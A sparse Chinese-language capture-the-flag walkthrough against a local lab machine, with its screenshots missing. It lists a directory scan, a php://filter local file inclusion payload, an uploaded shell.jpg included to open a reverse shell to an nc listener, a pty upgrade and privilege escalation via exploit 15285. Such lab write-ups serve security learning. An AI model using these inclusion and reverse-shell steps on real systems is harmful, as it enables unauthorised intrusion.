信息收集

 

 

./dirsearch.py --random-agents -u ‘http://192.168.17.142:8011/’ -e *

扫描目录

 

 

 

Bak泄露

 

 

 

John frank

 

 

 

登陆到development

 

 

 

Uploader可以上传

 

先看8081

 

 

 

Api

 

 

 

 

 

 

 

 

 

成功

可以包含出apache的一些服务

file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php

 

 

 

FRANKuploads

Nc -lvp 4235

file=/var/www/development/uploader/FRANKuploads/shell.jpg包含可以反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

 

 

 

Uname-a

 

获取shell

 

 

 

 

 

 

提权

获取编号15285

 

 

 

 

 

 

 

 

 

获得flag